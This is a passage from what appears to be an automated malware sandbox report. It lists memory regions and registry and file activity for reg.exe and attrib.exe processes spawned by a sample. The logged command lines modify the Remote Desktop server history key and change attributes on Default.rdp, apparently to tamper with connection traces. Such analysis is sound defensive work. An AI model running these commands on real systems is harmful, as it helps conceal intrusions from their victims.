imm32.dll	0x75350000	0x753affff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x753b0000	0x7544ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x75450000	0x754ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x754f0000	0x754f9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x75500000	0x755abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x75700000	0x75705fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75710000	0x757dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x757f0000	0x758dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x758e0000	0x758f8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75900000	0x75945fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75ab0000	0x75b3ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x75b70000	0x75ba4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076dc0000	0x76dc0000	0x76eb9fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000076ec0000	0x76ec0000	0x76fdefff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
ntdll.dll	0x76fe0000	0x77188fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x771c0000	0x7733ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Host Behavior

File (10)

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_ERROR_HANDLE	type = file_type	2	Fn
Open	STD_ERROR_HANDLE		6	Fn
Write	STD_ERROR_HANDLE	size = 7	1	Fn Data
Write	STD_ERROR_HANDLE	size = 67	1	Fn Data

Registry (2)

Operation	Key	Additional Information	Success	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System			1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers			1	Fn

Module (1)

Operation	Module	Additional Information	Success	Count	Logfile
Get Handle	c:\windows\syswow64\reg.exe	base_address = 0x460000		1	Fn

System (1)

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2017-09-07 12:22:27 (UTC)		1	Fn

Process #9: reg.exe

(Host: 11, Network: 0)

Information	Value
ID	#9
File Name	c:\windows\syswow64\reg.exe
Command Line	reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:08:11, Reason: Child Process
Unmonitor	End Time: 00:15:23, Reason: Terminated by Timeout
Monitor Duration	00:07:12

OS Process Information

Information	Value
PID	0x78c
Parent PID	0x30c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	6CURNMAPTGWD\YbZ8BTYYvts 7lFSQB0g
Groups	6CURNMAPTGWD\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f30f (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 5D4

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	Readable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000090000	0x00090000	0x00093fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000a0000	0x000a0000	0x000a0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000b0000	0x000b0000	0x000b1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
reg.exe.mui	0x000c0000	0x000c8fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000100000	0x00100000	0x0017ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000190000	0x00190000	0x001cffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000220000	0x00220000	0x0031ffff	Private Memory	Readable, Writable	Region Actions Download Dump
locale.nls	0x00320000	0x00386fff	Memory Mapped File	Readable	Region Actions
kernelbase.dll.mui	0x00390000	0x0044ffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x00000000004d0000	0x004d0000	0x004dffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000004e0000	0x004e0000	0x00667fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000670000	0x00670000	0x007f0fff	Pagefile Backed Memory	Readable	Region Actions
reg.exe	0x008f0000	0x00941fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000950000	0x00950000	0x01d4ffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01d50000	0x0201efff	Memory Mapped File	Readable	Region Actions
wow64win.dll	0x73710000	0x7376bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x73770000	0x737aefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x737c0000	0x737c7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74d10000	0x74d1bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74d20000	0x74d7ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x74d80000	0x74dd6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x75140000	0x7524ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75250000	0x7534ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x75350000	0x753affff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x753b0000	0x7544ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x75450000	0x754ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x754f0000	0x754f9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x75500000	0x755abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x75700000	0x75705fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75710000	0x757dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x757f0000	0x758dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x758e0000	0x758f8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75900000	0x75945fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75ab0000	0x75b3ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x75b70000	0x75ba4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076dc0000	0x76dc0000	0x76eb9fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000076ec0000	0x76ec0000	0x76fdefff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x76fe0000	0x77188fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x771c0000	0x7733ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Host Behavior

File (5)

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE		3	Fn
Write	STD_OUTPUT_HANDLE	size = 39	1	Fn Data

Registry (4)

Operation	Key	Additional Information	Count	Logfile
Create Key	HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System		1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers		1	Fn
Write Value	HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers	size = 2, type = REG_SZ	1	Fn

Module (1)

Operation	Module	Additional Information	Success	Count	Logfile
Get Handle	c:\windows\syswow64\reg.exe	base_address = 0x8f0000		1	Fn

System (1)

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2017-09-07 12:22:27 (UTC)		1	Fn

Process #10: attrib.exe'

Information	Value
ID	#10
File Name	c:\windows\syswow64\attrib.exe
Command Line	attrib Default.rdp -s -h
Initial Working Directory	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\
Monitor	Start Time: 00:08:11, Reason: Child Process
Unmonitor	End Time: 00:15:23, Reason: Terminated by Timeout
Monitor Duration	00:07:12
Remarks	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x648
Parent PID	0x30c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	6CURNMAPTGWD\YbZ8BTYYvts 7lFSQB0g
Groups	6CURNMAPTGWD\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f30f (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 420

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions Download Dump
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00070000	0x000d6fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000170000	0x00170000	0x001affff	Private Memory	Readable, Writable	Region Actions Download Dump
attrib.exe	0x00200000	0x00206fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000280000	0x00280000	0x002bffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000400000	0x00400000	0x0040ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000490000	0x00490000	0x0050ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000510000	0x00510000	0x00697fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000006e0000	0x006e0000	0x007dffff	Private Memory	Readable, Writable	Region Actions Download Dump
wow64win.dll	0x73710000	0x7376bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x73770000	0x737aefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x737c0000	0x737c7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ulib.dll	0x74be0000	0x74bfcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74d10000	0x74d1bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74d20000	0x74d7ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x75140000	0x7524ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75250000	0x7534ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x75350000	0x753affff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x753b0000	0x7544ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x75450000	0x754ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x754f0000	0x754f9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x75500000	0x755abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75710000	0x757dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x757f0000	0x758dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x758e0000	0x758f8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75900000	0x75945fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75ab0000	0x75b3ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076dc0000	0x76dc0000	0x76eb9fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000076ec0000	0x76ec0000	0x76fdefff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x76fe0000	0x77188fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x771c0000	0x7733ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions